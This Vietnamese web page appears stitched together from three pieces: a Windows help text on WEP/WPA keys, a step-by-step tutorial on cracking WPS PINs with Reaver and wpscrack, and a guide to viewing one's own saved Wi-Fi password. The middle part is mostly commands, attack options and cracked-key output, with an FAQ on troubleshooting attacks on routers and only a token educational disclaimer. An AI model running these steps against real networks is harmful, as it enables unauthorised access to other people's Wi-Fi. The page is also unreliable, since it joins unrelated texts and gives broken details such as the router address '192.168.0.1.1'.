Khóa wpa trên bộ định tuyến là gì Tìm mật khẩu trên phần cứng. Là gì và làm thế nào để tìm ra khóa bảo mật mạng Wi-Fi cho thiết bị của bạn

Dữ liệu cá nhân và các tập tin trên mạng không dây đôi khi có thể bị truy cập bởi những người không được phép chặn tín hiệu mạng. Điều này có thể dẫn đến việc đánh cắp danh tính và các hoạt động độc hại khác. Khóa hoặc cụm mật khẩu bảo mật mạng có thể giúp bảo vệ mạng không dây của bạn khỏi sự truy cập trái phép như vậy.

Làm theo Trình hướng dẫn Thiết lập Mạng để định cấu hình khóa bảo mật.

Ghi chú.

  • Không nên sử dụng WEP để bảo mật mạng không dây của bạn. Truy cập được bảo vệ bằng Wi-Fi (WPA hoặc WPA2) đáng tin cậy hơn. Nếu bạn cố gắng sử dụng WPA và WPA2 và chúng không hoạt động, chúng tôi khuyên bạn nên thay thế bộ điều hợp mạng bằng bộ điều hợp hỗ trợ WPA hoặc WPA2. Tất cả các thiết bị mạng, máy tính, bộ định tuyến và điểm truy cập cũng phải hỗ trợ WPA hoặc WPA2.

Phương pháp mã hóa cho mạng không dây

Ngày nay, có ba loại mã hóa không dây: Truy cập được bảo vệ Wi-Fi (WPA và WPA2), Quyền riêng tư tương đương có dây (WEP) và 802.1x. Hai phương pháp đầu tiên được mô tả chi tiết trong các phần sau. Giao thức 802.1x thường được sử dụng trong các mạng công ty và không được thảo luận ở đây.

Truy cập được bảo vệ Wi-Fi (WPA và WPA2)

WPA và WPA2 yêu cầu người dùng cung cấp khóa bảo mật để kết nối. Sau khi khóa được xác minh, tất cả dữ liệu được truyền giữa máy tính hoặc thiết bị và điểm truy cập sẽ được mã hóa.

Có hai loại xác thực WPA: WPA và WPA2. Sử dụng WPA2 bất cứ khi nào có thể vì nó mang lại sự bảo mật cao nhất. Hầu như tất cả các bộ điều hợp mạng không dây mới đều hỗ trợ WPA và WPA2, nhưng một số mẫu cũ hơn thì không. Trong WPA-Personal và WPA2-Personal, tất cả người dùng đều được gán cùng một cụm mật khẩu. Chế độ này được khuyên dùng cho mạng gia đình. WPA-Enterprise và WPA2-Enterprise được thiết kế để sử dụng với máy chủ xác thực 802.1x, cung cấp các khóa khác nhau cho tất cả người dùng. Chế độ này được sử dụng chủ yếu trên các mạng làm việc.

Giao thức WEP (Quyền riêng tư tương đương có dây)

WEP là một phương pháp bảo mật mạng cũ hơn. Nó vẫn có sẵn để hỗ trợ các thiết bị cũ, nhưng việc sử dụng nó không được khuyến khích. Kích hoạt WEP sẽ cấu hình khóa bảo mật mạng. Khóa này mã hóa thông tin mà máy tính truyền qua mạng tới các máy tính khác. Tuy nhiên, bảo mật WEP tương đối dễ bị phá vỡ.

Có hai loại phương thức bảo mật WEP: xác thực hệ thống mở và xác thực khóa chung. Cả hai đều không cung cấp mức độ bảo mật cao nhưng phương thức xác thực khóa chung lại kém an toàn hơn. Đối với hầu hết các máy tính và điểm truy cập không dây, khóa xác thực khóa dùng chung giống với khóa mã hóa WEP tĩnh được sử dụng để bảo mật mạng. Kẻ tấn công chặn thông báo xác thực khóa chia sẻ thành công có thể sử dụng các công cụ phân tích để xác định khóa xác thực khóa chia sẻ và sau đó là khóa mã hóa WEP tĩnh. Khi khóa mã hóa WEP tĩnh được xác định, kẻ tấn công có thể có toàn quyền truy cập vào mạng. Vì lý do này, phiên bản Windows này không tự động hỗ trợ cấu hình mạng thông qua xác thực khóa chia sẻ WEP.

Nếu, bất chấp những cảnh báo này, việc xác thực bằng khóa chia sẻ WEP là bắt buộc, hãy làm theo các bước sau:

Cách đây không lâu, có vẻ như mạng không dây được bảo vệ bằng công nghệ WPA2 khá an toàn. Tìm một chiếc chìa khóa đơn giản để kết nối là điều thực sự có thể. Nhưng nếu bạn cài đặt một khóa thực sự dài, cả bảng cầu vồng và thậm chí cả khả năng tăng tốc GPU đều không giúp bạn khắc phục được. Tuy nhiên, hóa ra, bạn có thể kết nối với mạng không dây mà không cần điều này - bằng cách tận dụng lỗ hổng được phát hiện gần đây trong giao thức WPS.

CẢNH BÁO

Tất cả thông tin được trình bày chỉ nhằm mục đích giáo dục. Việc xâm nhập vào mạng không dây của người khác có thể dễ dàng bị coi là hành vi phạm tội hình sự. Hãy suy nghĩ bằng cái đầu của bạn.

Cái giá của sự đơn giản hóa

Ngày càng có ít điểm truy cập mở mà bạn không cần nhập khóa để kết nối. Có vẻ như chúng sẽ sớm được ghi vào Sách đỏ. Nếu trước đây một người thậm chí có thể không biết rằng mạng không dây có thể được khóa bằng chìa khóa, bảo vệ bản thân khỏi các kết nối bên ngoài, thì giờ đây anh ta ngày càng được thông báo nhiều hơn về khả năng này. Lấy ví dụ, chương trình cơ sở tùy chỉnh mà các nhà cung cấp hàng đầu phát hành cho các mẫu bộ định tuyến phổ biến để đơn giản hóa việc thiết lập. Bạn cần chỉ định hai thứ - thông tin đăng nhập/mật khẩu và... chìa khóa để bảo vệ mạng không dây. Quan trọng hơn, chính các nhà sản xuất phần cứng đang cố gắng làm cho quá trình thiết lập trở nên đơn giản. Do đó, hầu hết các bộ định tuyến hiện đại đều hỗ trợ cơ chế WPS (Wi-Fi Protected Setup). Với sự trợ giúp của nó, người dùng có thể thiết lập một mạng không dây an toàn chỉ trong vài giây mà không cần bận tâm đến thực tế là “bạn cần kích hoạt mã hóa ở một nơi khác và đăng ký khóa WPA”. Tôi đã nhập mã PIN tượng trưng gồm tám chữ số vào hệ thống, mã này được ghi trên bộ định tuyến và bạn đã hoàn tất! Và đây, hãy giữ chặt nhé. Vào tháng 12, hai nhà nghiên cứu đã nói về những sai sót cơ bản nghiêm trọng trong giao thức WPS. Nó giống như một cửa sau cho bất kỳ bộ định tuyến nào. Hóa ra là nếu WPS được kích hoạt tại điểm truy cập (trong một thời điểm, tính năng này được bật ở hầu hết các bộ định tuyến theo mặc định), thì bạn có thể chọn mã PIN để kết nối và trích xuất khóa để kết nối trong vài giờ!

WPS hoạt động như thế nào?

Ý tưởng của những người tạo ra WPS là tốt. Cơ chế tự động đặt tên mạng và mã hóa. Do đó, người dùng không cần phải vào giao diện web và xử lý các cài đặt phức tạp. Và bạn có thể dễ dàng thêm bất kỳ thiết bị nào (ví dụ: máy tính xách tay) vào mạng đã được định cấu hình: nếu bạn nhập đúng mã PIN, thiết bị sẽ nhận được tất cả các cài đặt cần thiết. Điều này rất thuận tiện, đó là lý do tại sao tất cả các hãng lớn trên thị trường (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) hiện đều cung cấp bộ định tuyến không dây có hỗ trợ WPS. Chúng ta hãy xem xét nó chi tiết hơn một chút.

Có ba tùy chọn để sử dụng WPS:

  1. Kết nối bằng nút nhấn (PBC). Người dùng nhấn một nút đặc biệt trên bộ định tuyến (phần cứng) và trên máy tính (phần mềm), từ đó kích hoạt quá trình thiết lập. Chúng tôi không quan tâm đến điều này.
  2. Nhập mã PIN vào giao diện web. Người dùng truy cập vào giao diện quản trị của bộ định tuyến thông qua trình duyệt và nhập mã PIN gồm 8 chữ số được ghi trên thân thiết bị (Hình 1), sau đó quá trình thiết lập sẽ diễn ra. Phương pháp này phù hợp hơn với cấu hình ban đầu của bộ định tuyến, vì vậy chúng tôi cũng sẽ không xem xét nó.
  3. Nhập mã PIN trên máy tính người dùng (Hình 2). Khi kết nối với bộ định tuyến, bạn có thể mở một phiên WPS đặc biệt, trong đó bạn có thể định cấu hình bộ định tuyến hoặc nhận các cài đặt hiện có nếu bạn nhập chính xác mã PIN. Điều này đã hấp dẫn rồi. Không cần xác thực để mở một phiên như vậy. Bất cứ ai cũng có thể làm điều này! Hóa ra mã PIN đã có khả năng dễ bị tấn công vũ phu. Nhưng đây chỉ là những bông hoa.

Tính dễ bị tổn thương

Như tôi đã lưu ý trước đó, mã PIN bao gồm tám chữ số - do đó, có 10^8 (100.000.000) tùy chọn để khớp. Tuy nhiên, số lượng tùy chọn có thể giảm đáng kể. Thực tế là chữ số cuối cùng của mã PIN là một loại tổng kiểm tra, được tính dựa trên bảy chữ số đầu tiên. Kết quả là chúng ta đã có 10^7 (10.000.000) tùy chọn. Nhưng đó không phải là tất cả! Tiếp theo, chúng ta xem xét kỹ thiết bị của giao thức xác thực WPS (Hình 3). Có cảm giác như nó được thiết kế đặc biệt để chừa chỗ cho vũ lực. Hóa ra việc xác minh mã PIN được thực hiện theo hai giai đoạn. Nó được chia thành hai phần bằng nhau và mỗi phần đều được kiểm tra riêng! Chúng ta hãy nhìn vào sơ đồ:

  1. Nếu sau khi gửi tin nhắn M4, kẻ tấn công nhận được phản hồi EAP-NACK thì kẻ tấn công có thể chắc chắn rằng phần đầu tiên của mã PIN không chính xác.
  2. Nếu anh ta nhận được EAP-NACK sau khi gửi M6, thì phần thứ hai của mã PIN không chính xác. Chúng ta có 10^4 (10.000) lựa chọn cho hiệp một và 10^3 (1.000) cho hiệp hai. Kết quả là chúng tôi chỉ có 11.000 tùy chọn để tìm kiếm đầy đủ. Để hiểu rõ hơn cách thức hoạt động của nó, hãy nhìn vào sơ đồ.
  3. Một điểm quan trọng là tốc độ tìm kiếm có thể. Nó bị giới hạn bởi tốc độ bộ định tuyến xử lý các yêu cầu WPS: một số điểm truy cập sẽ tạo ra kết quả mỗi giây, một số khác sẽ tạo ra kết quả cứ sau 10 giây. Phần lớn thời gian được dành cho việc tính toán khóa chung bằng thuật toán Diffie-Hellman; nó phải được tạo trước bước M3. Có thể giảm thời gian dành cho việc này bằng cách chọn một khóa bí mật đơn giản ở phía máy khách, điều này sẽ đơn giản hóa việc tính toán các khóa khác trong tương lai. Thực tiễn cho thấy rằng để có được kết quả thành công, thông thường chỉ cần thực hiện một nửa trong số các lựa chọn là đủ và trung bình, bạo lực chỉ mất bốn đến mười giờ.

Thực hiện lần đầu

Việc triển khai vũ lực đầu tiên xuất hiện là tiện ích wpscrack (goo.gl/9wABj), được viết bởi nhà nghiên cứu Stefan Viböck bằng Python. Tiện ích này sử dụng thư viện Scapy, cho phép bạn chèn các gói mạng tùy ý. Tập lệnh chỉ có thể chạy trong hệ thống Linux, sau lần đầu tiên chuyển giao diện không dây sang chế độ giám sát. Là tham số, bạn phải chỉ định tên của giao diện mạng trong hệ thống, địa chỉ MAC của bộ điều hợp không dây, cũng như địa chỉ MAC của điểm truy cập và tên của nó (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer bắt đầu thử 00000000 lần thử 0,95 giây thử 00010009<...>thử 18660005 lần thử mất 1,08 giây thử 18670004# tìm thấy nửa đầu của lần thử mã PIN mất 1,09 giây thử 18670011 lần thử mất 1,08 giây<...>đang thử 18674095# tìm thấy nửa sau của mã PIN<...>Khóa mạng: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F thực_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_passphras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Như bạn có thể thấy, nửa đầu tiên của mã PIN đã được chọn, sau đó là nửa thứ hai và cuối cùng, chương trình đã tạo ra một khóa sẵn sàng sử dụng để kết nối với mạng không dây. Thật khó để tưởng tượng sẽ mất bao lâu để tìm ra khóa có độ dài này (61 ký tự) bằng các công cụ có sẵn. Tuy nhiên, wpscrack không phải là tiện ích duy nhất để khai thác lỗ hổng và đây là một khoảnh khắc khá buồn cười: cùng lúc đó, một nhà nghiên cứu khác, Craig Heffner từ Strategic Network Solutions, cũng đang nghiên cứu vấn đề tương tự. Nhận thấy một PoC đang hoạt động để thực hiện một cuộc tấn công đã xuất hiện trên Internet, anh ấy đã xuất bản tiện ích Reaver của mình. Nó không chỉ tự động hóa quá trình chọn WPS-PIN và trích xuất khóa PSK mà còn cung cấp nhiều cài đặt hơn để có thể thực hiện cuộc tấn công đối với nhiều loại bộ định tuyến. Ngoài ra, nó hỗ trợ số lượng bộ điều hợp không dây lớn hơn nhiều. Chúng tôi quyết định lấy nó làm cơ sở và mô tả chi tiết cách kẻ tấn công có thể sử dụng lỗ hổng trong giao thức WPS để kết nối với mạng không dây an toàn.

LÀM CÁCH NÀO ĐỂ

Giống như bất kỳ cuộc tấn công nào khác vào mạng không dây, chúng tôi sẽ cần Linux. Ở đây phải nói rằng Reaver có mặt trong kho của bản phân phối BackTrack nổi tiếng, kho này cũng đã bao gồm các trình điều khiển cần thiết cho các thiết bị không dây. Vì vậy, chúng tôi sẽ sử dụng nó một cách chính xác.

Bước 0. Chuẩn bị hệ thống

Trên trang web chính thức, BackTrack 5 R1 có sẵn để tải xuống dưới dạng máy ảo trong VMware và ảnh ISO có thể khởi động. Tôi đề nghị lựa chọn cuối cùng. Bạn có thể chỉ cần ghi hình ảnh vào đĩa hoặc có thể sử dụng chương trình để tạo ổ flash USB có khả năng khởi động: bằng cách này hay cách khác, sau khi khởi động từ phương tiện như vậy, chúng ta sẽ ngay lập tức có một hệ thống sẵn sàng hoạt động mà không gặp bất kỳ sự cố không cần thiết nào.

Khóa học cấp tốc về hack Wi-Fi

  1. WEP (Quyền riêng tư tương đương có dây) Công nghệ đầu tiên để bảo vệ mạng không dây hóa ra lại cực kỳ yếu. Bạn có thể hack nó theo đúng nghĩa đen trong vài phút bằng cách sử dụng điểm yếu của mật mã RC4 được sử dụng trong đó. Các công cụ chính ở đây là airodump-ng sniffer để thu thập các gói và tiện ích aircrack-ng, được sử dụng trực tiếp để bẻ khóa. Ngoài ra còn có một công cụ đặc biệt wesside-ng, thường tự động hack tất cả các điểm WEP gần đó.
  2. WPA/WPA2 (Truy cập được bảo vệ không dây)

Brute Force là cách duy nhất để tìm khóa cho mạng WPA/WPA2 đóng (và thậm chí chỉ khi có một kết xuất của cái gọi là Bắt tay WPA, được phát sóng khi máy khách kết nối với một điểm truy cập).

Sức mạnh tàn bạo có thể kéo dài nhiều ngày, nhiều tháng và nhiều năm. Để tăng hiệu quả tìm kiếm, các từ điển chuyên dụng lần đầu tiên được sử dụng, sau đó tạo bảng cầu vồng và sau đó xuất hiện các tiện ích sử dụng công nghệ NVIDIA CUDA và ATI Stream để tăng tốc phần cứng quá trình sử dụng GPU. Các công cụ được sử dụng là aircrack-ng (sử dụng từ điển), cowpatty (sử dụng bảng Rainbow), pyrit (sử dụng card màn hình).

Bước 1: Đăng nhập

Tên đăng nhập và mật khẩu mặc định là root:toor. Khi ở trong bảng điều khiển, bạn có thể khởi động “X” một cách an toàn (có các tập hợp BackTrack riêng biệt - cả với Gnome và KDE):

#startx

Bước 2: Cài đặt Reaver

Để tải xuống Reaver, chúng tôi sẽ cần có internet. Do đó, chúng tôi kết nối dây vá hoặc định cấu hình bộ điều hợp không dây (menu “Ứng dụng > Internet > Trình quản lý mạng Wicd”). Tiếp theo, chúng tôi khởi chạy trình mô phỏng thiết bị đầu cuối, nơi chúng tôi tải xuống phiên bản mới nhất của tiện ích thông qua kho lưu trữ:

# cập nhật apt-get # apt-get cài đặt reaver

Ở đây tôi phải nói rằng kho lưu trữ chứa phiên bản 1.3, phiên bản này đối với tôi không hoạt động chính xác. Sau khi tìm kiếm thông tin về vấn đề, tôi tìm được bài đăng của tác giả, trong đó khuyến nghị nên cập nhật lên phiên bản cao nhất có thể bằng cách tổng hợp các nguồn lấy từ SVN. Nhìn chung, đây là phương pháp cài đặt phổ biến nhất (đối với mọi bản phân phối).

$ svn kiểm tra http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make cài đặt

Sẽ không có vấn đề gì khi lắp ráp trong BackTrack - tôi đã tự mình kiểm tra. Trong bản phân phối Arch Linux mà tôi sử dụng, việc cài đặt thậm chí còn đơn giản hơn nhờ sự hiện diện của PKGBUILD tương ứng:

$ yaourt -S reaver-wps-svn

Bước 3. Chuẩn bị cho vũ lực

Để sử dụng Reaver bạn cần làm như sau:

  • chuyển bộ điều hợp không dây sang chế độ giám sát;
  • tìm ra tên của giao diện không dây;
  • tìm ra địa chỉ MAC của điểm truy cập (BSSID);
  • đảm bảo rằng WPS được kích hoạt tại điểm đó.

Trước tiên, hãy kiểm tra xem giao diện không dây có trong hệ thống hay không:

#iwconfig

Nếu đầu ra của lệnh này chứa giao diện có mô tả (thường là wlan0), điều đó có nghĩa là hệ thống đã nhận dạng được bộ điều hợp (nếu nó được kết nối với mạng không dây để tải Reaver thì tốt hơn hết là ngắt kết nối). Hãy đặt bộ chuyển đổi vào chế độ giám sát:

# airmon-ng bắt đầu wlan0

Lệnh này tạo giao diện ảo ở chế độ giám sát, tên của nó sẽ được chỉ định ở đầu ra lệnh (thường là mon0). Bây giờ chúng ta cần tìm điểm truy cập để tấn công và tìm ra BSSID của nó. Hãy sử dụng tiện ích để nghe chương trình phát sóng không dây airodump-ng:

#airodump-ngmon0

Danh sách các điểm truy cập trong phạm vi sẽ xuất hiện trên màn hình. Chúng tôi quan tâm đến các điểm có mã hóa WPA/WPA2 và xác thực khóa PSK.

Tốt hơn là chọn một trong những người đầu tiên trong danh sách, vì mong muốn giao tiếp tốt với điểm để thực hiện một cuộc tấn công. Nếu có nhiều điểm và danh sách không vừa với màn hình, thì bạn có thể sử dụng một tiện ích nổi tiếng khác - kismet, nơi có giao diện phù hợp hơn về mặt này. Tùy chọn, bạn có thể kiểm tra tại chỗ xem cơ chế WPS có được bật tại thời điểm của chúng tôi hay không. Để thực hiện việc này, Reaver đi kèm với (nhưng chỉ khi bạn lấy nó từ SVN) tiện ích rửa:

# ./wash -i mon0

Tham số là tên của giao diện được chuyển sang chế độ giám sát. Bạn cũng có thể sử dụng tùy chọn '-f' và cung cấp cho tiện ích một tệp giới hạn được tạo, chẳng hạn như bởi cùng một airodump-ng. Vì một số lý do không xác định, gói Reaver trong BackTrack không bao gồm tiện ích rửa. Hãy hy vọng lỗi này sẽ được sửa chữa vào thời điểm bài viết này được xuất bản.

Bước 4. Chạy vũ phu

Bây giờ bạn có thể tiến hành trực tiếp để tìm kiếm mã PIN. Để khởi động Reaver trong trường hợp đơn giản nhất, bạn không cần nhiều thứ. Bạn chỉ cần chỉ định tên của giao diện (trước đây chúng tôi đã chuyển sang chế độ giám sát) và BSSID của điểm truy cập:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

Công tắc "-vv" cho phép đầu ra chương trình nâng cao để chúng tôi có thể đảm bảo mọi thứ hoạt động như mong đợi.

Reaver v1.4 Công cụ tấn công thiết lập bảo vệ WiFi Bản quyền (c) 2011, Giải pháp mạng chiến thuật, Craig Heffner [+] Đang chờ đèn hiệu từ 00:21:29:74:67:50 [+] Liên kết với 00:21:29:74:67:50 (ESSID: linksys) [+] Đang thử mã pin 63979978

Nếu chương trình liên tục gửi mã PIN đến điểm truy cập, điều đó có nghĩa là mọi thứ đã bắt đầu tốt đẹp và tất cả những gì còn lại là chờ đợi một cách ngu ngốc. Quá trình này có thể mất một thời gian dài. Thời gian ngắn nhất mà tôi có thể sử dụng mã PIN là khoảng năm giờ. Ngay sau khi được chọn, chương trình sẽ vui vẻ thông báo cho bạn về điều đó:

[+] Đang thử mã pin 64637129 [+] Khóa bị bẻ khóa sau 13654 giây [+] Mã PIN WPS: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Tất nhiên, thứ có giá trị nhất ở đây là khóa WPA-PSK, bạn có thể sử dụng ngay để kết nối. Mọi thứ đơn giản đến mức nó thậm chí không vừa với đầu bạn.


Có thể tự vệ được không?

Hiện tại, chỉ có một cách để bảo vệ bạn khỏi một cuộc tấn công - tắt WPS trong cài đặt bộ định tuyến. Tuy nhiên, hóa ra, điều này không phải lúc nào cũng có thể thực hiện được. Vì lỗ hổng này không tồn tại ở cấp độ triển khai mà ở cấp độ giao thức, bạn không nên mong đợi một bản vá nhanh chóng từ các nhà sản xuất sẽ giải quyết được tất cả các vấn đề. Điều họ có thể làm nhất bây giờ là chống lại vũ lực càng nhiều càng tốt. Ví dụ: nếu bạn chặn WPS trong một giờ sau năm lần nhập mã PIN không thành công thì quá trình tìm kiếm sẽ mất khoảng 90 ngày. Nhưng một câu hỏi khác là, làm thế nào một bản vá như vậy có thể được tung ra cho hàng triệu thiết bị hoạt động trên toàn thế giới?

Nâng cấp Reaver

Trong HOWTO, chúng tôi đã trình bày cách đơn giản và linh hoạt nhất để sử dụng tiện ích Reaver. Tuy nhiên, việc triển khai WPS khác nhau tùy theo nhà sản xuất, vì vậy trong một số trường hợp cần có cấu hình bổ sung. Dưới đây tôi sẽ cung cấp các tùy chọn bổ sung có thể tăng tốc độ và hiệu quả tìm kiếm khóa.

  1. Bạn có thể đặt số kênh và SSID của điểm truy cập: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Tùy chọn '—dh-small' có tác dụng có lợi đối với tốc độ mạnh mẽ, vì nó đặt một giá trị nhỏ cho khóa bí mật, từ đó tạo điều kiện thuận lợi cho việc tính toán ở phía điểm truy cập: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-nhỏ
  3. Thời gian chờ phản hồi mặc định là năm giây. Nếu cần, bạn có thể thay đổi: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Độ trễ mặc định giữa các lần thử là một giây. Nó cũng có thể được cấu hình: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Một số điểm truy cập có thể chặn WPS trong một thời gian nhất định vì nghi ngờ rằng chúng đang bị lừa đảo. Reaver nhận thấy tình huống này và tạm dừng tìm kiếm trong 315 giây theo mặc định, thời lượng tạm dừng này có thể thay đổi: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Một số triển khai của giao thức WPS sẽ chấm dứt kết nối nếu mã PIN không chính xác, mặc dù theo đặc điểm kỹ thuật, chúng sẽ trả về một thông báo đặc biệt. Reaver tự động nhận ra tình huống này, vì điều này có tùy chọn ‘—nack’: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Tùy chọn '--eap-terminate' nhằm mục đích hoạt động với những AP yêu cầu chấm dứt phiên WPS bằng thông báo EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -chấm dứt
  8. Việc xảy ra lỗi trong phiên WPS có thể có nghĩa là AP đang hạn chế số lần thử nhập mã PIN hoặc đơn giản là bị quá tải với các yêu cầu. Thông tin về điều này sẽ được hiển thị trên màn hình. Trong trường hợp này, Reaver tạm dừng hoạt động của nó và thời gian tạm dừng có thể được đặt bằng tùy chọn '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

Câu hỏi thường gặp

Câu hỏi: Cần có bộ chuyển đổi không dây nào để hack?

Trả lời: Trước khi thử nghiệm, bạn cần đảm bảo rằng bộ điều hợp không dây có thể hoạt động ở chế độ giám sát. Cách tốt nhất là kiểm tra danh sách phần cứng được hỗ trợ trên trang web của dự án Aircrack-ng. Nếu câu hỏi đặt ra là nên mua mô-đun không dây nào, thì bạn có thể bắt đầu với bất kỳ bộ chuyển đổi nào dựa trên chipset RTL8187L. Bạn có thể dễ dàng tìm thấy USB dongle trên Internet với giá 20 USD.

Câu hỏi: Tại sao tôi gặp lỗi "hết thời gian chờ" và "không đúng thứ tự"?

Trả lời: Điều này thường xảy ra do cường độ tín hiệu yếu và khả năng giao tiếp với điểm truy cập kém. Ngoài ra, điểm truy cập có thể tạm thời chặn việc sử dụng WPS.

Câu hỏi: Tại sao việc giả mạo địa chỉ MAC không có tác dụng với tôi?

Trả lời: Có thể bạn sẽ giả mạo MAC của giao diện ảo mon0 và cách này sẽ không hiệu quả. Bạn phải chỉ định tên của giao diện thực, ví dụ: wlan0.

Câu hỏi: Tại sao Reaver hoạt động kém khi tín hiệu kém, mặc dù việc hack WEP tương tự vẫn hoạt động tốt?

Trả lời: Việc bẻ khóa WEP thường xảy ra bằng cách truyền lại các gói đã bắt được để thu được nhiều vectơ khởi tạo (IV) cần thiết để bẻ khóa thành công. Trong trường hợp này, việc gói tin nào bị mất hoặc bị hư hỏng trên đường đi không thành vấn đề. Nhưng để tấn công WPS, bạn phải tuân thủ nghiêm ngặt giao thức truyền gói tin giữa access point và Reaver để kiểm tra từng mã PIN. Và nếu cùng lúc đó một số gói bị mất hoặc đến ở dạng không đứng đắn, thì bạn sẽ phải thiết lập lại phiên WPS. Điều này khiến các cuộc tấn công vào WPS phụ thuộc nhiều hơn vào cường độ tín hiệu. Điều quan trọng cần nhớ là chỉ vì bộ điều hợp không dây của bạn nhìn thấy điểm truy cập, điều này không có nghĩa là điểm truy cập đó nhìn thấy bạn. Vì vậy, nếu bạn là chủ sở hữu vui vẻ của bộ chuyển đổi công suất cao từ Mạng ALFA và ăng-ten vài chục dBi, thì đừng mong đợi có thể phá vỡ tất cả các điểm truy cập bị bắt.

Câu hỏi: Reaver luôn gửi cùng một mã PIN đến điểm truy cập, có chuyện gì vậy?

Trả lời: Kiểm tra xem WPS đã được kích hoạt trên bộ định tuyến chưa. Điều này có thể được thực hiện bằng cách sử dụng tiện ích wash: chạy nó và kiểm tra xem mục tiêu của bạn có trong danh sách hay không.

Câu hỏi: Tại sao tôi không thể liên kết với điểm truy cập?

Trả lời: Điều này có thể là do cường độ tín hiệu kém hoặc do bộ chuyển đổi của bạn không phù hợp cho nghiên cứu đó.

Câu hỏi: Tại sao tôi liên tục gặp lỗi "phát hiện giới hạn tốc độ"? Trả lời: Điều này là do điểm truy cập đã chặn WPS. Thông thường đây là lệnh chặn tạm thời (khoảng năm phút), nhưng trong một số trường hợp, họ có thể áp dụng lệnh cấm vĩnh viễn (chỉ bỏ chặn thông qua bảng quản trị). Có một lỗi khó chịu trong phiên bản Reaver 1.3, do đó không phát hiện được việc loại bỏ các khóa như vậy. Để giải quyết vấn đề này, họ khuyên bạn nên sử dụng tùy chọn ‘—ignore-locks’ hoặc tải xuống phiên bản mới nhất từ ​​SVN.

Câu hỏi: Tôi có thể chạy hai hoặc nhiều phiên bản Reaver cùng lúc để tăng tốc độ tấn công của mình không?

Trả lời: Về mặt lý thuyết thì có thể, nhưng nếu chúng tấn công cùng một điểm truy cập thì tốc độ tìm kiếm khó có thể tăng lên, vì trong trường hợp này nó bị hạn chế bởi phần cứng yếu của điểm truy cập, vốn đã được tải đầy đủ ngay cả với một kẻ tấn công .

Nếu bạn quên mật khẩu của mạng không dây mà bạn hiện đang kết nối, bạn có thể dễ dàng tìm ra mật khẩu đó qua máy tính mà không cần tải xuống phần mềm của bên thứ ba. Tình trạng này thường xảy ra khi khách đến gặp bạn và yêu cầu sử dụng mạng Wi-Fi nhưng bạn đã kết nối mạng này quá lâu nên quên hết mật khẩu. Nếu bạn đã cài đặt hệ điều hành Windows thì bạn có thêm hai cách để tìm khóa bảo mật mạng thông qua máy tính của mình. Trong các tình huống khác, tốt hơn là bạn nên xem nó trên trình duyệt thông qua cài đặt bộ định tuyến. Hãy xem xét tất cả các tùy chọn trong bài viết này và chọn tùy chọn thuận tiện nhất cho mình.

Cách tìm key bảo mật mạng trong Windows

Hệ điều hành này khá linh hoạt nên bạn có thể dễ dàng xem được mật khẩu và key mà mình đã nhập. Bạn chỉ cần có quyền truy cập vào một máy tính được kết nối với mạng Wi-Fi.

Cách tìm khóa bảo mật mạng qua khay máy tính

  • Cách nhanh nhất để tìm ra mật khẩu WiFi. Chỉ cần tìm biểu tượng mạng trong khay trên máy tính của bạn. Nó nằm cạnh ngày và giờ và có thể trông giống như ăng-ten hoặc ký hiệu mạng trên điện thoại.
  • Chọn mạng mà bạn muốn tìm mật khẩu. Máy tính của bạn phải được kết nối với nó.
    Nhấp chuột phải vào tên của nó.
  • Chọn “Thuộc tính” từ danh sách xuất hiện.


  • Một cửa sổ sẽ mở chứa mật khẩu của bạn. Theo mặc định, các ký tự mật khẩu được bảo vệ bằng cài đặt hiển thị. Đánh dấu vào ô bên cạnh dòng chữ “Hiển thị các ký tự đã nhập” để xem mật khẩu.


Cách tìm khóa bảo mật mạng thông qua Network Sharing Center

Nếu bạn không thể tìm ra mật khẩu bằng phương pháp trước đó vì lý do nào đó. Sau đó, bạn có thể truy cập cửa sổ thuộc tính của mạng này theo cách khác.

  • Mở khay máy tính của bạn và nhấp lại vào biểu tượng mạng. Nhấp vào liên kết “Trung tâm mạng và chia sẻ”.


  • Tại đây bạn sẽ thấy mạng không dây được kết nối, bạn cần nhấp vào liên kết ở giữa cửa sổ.


  • Trong cửa sổ xuất hiện, chọn trường “Thuộc tính mạng không dây”.


  • Bây giờ hãy chuyển đến tab “Bảo mật”.


  • Bạn thấy mình đang ở trong cửa sổ vốn đã quen thuộc với mật khẩu kết nối Wi-Fi. Chọn hộp để hiển thị các ký hiệu và tìm ra khóa mạng không dây của bạn.


Cách tìm khóa bảo mật mạng thông qua cài đặt bộ định tuyến

Tùy chọn này phù hợp với mọi hệ điều hành vì bạn làm việc trực tiếp với bộ định tuyến.

  • Bạn có thể truy cập cài đặt của bộ định tuyến hoặc bộ định tuyến thông qua trình duyệt. Chỉ cần nhập cổng sau vào thanh địa chỉ: 192.168.0.1 hoặc 192.168.0.1.1
  • Mật khẩu mặc định và thông tin đăng nhập cho tất cả các bộ định tuyến là “quản trị viên” không có dấu ngoặc kép. Nếu bạn thay đổi tham số này, hãy nhập tên người dùng và mật khẩu của bạn.


  • Khi ở trong menu, hãy chọn “Chế độ không dây”.


  • Bây giờ hãy chuyển đến tab “Bảo mật không dây”.
  • Tại đây, bạn có thể tìm thấy mật khẩu của mạng Wi-Fi trong phần “Mật khẩu mạng không dây”. Hãy viết nó ra và giữ nó ở một nơi an toàn để bạn không bao giờ quên nó.


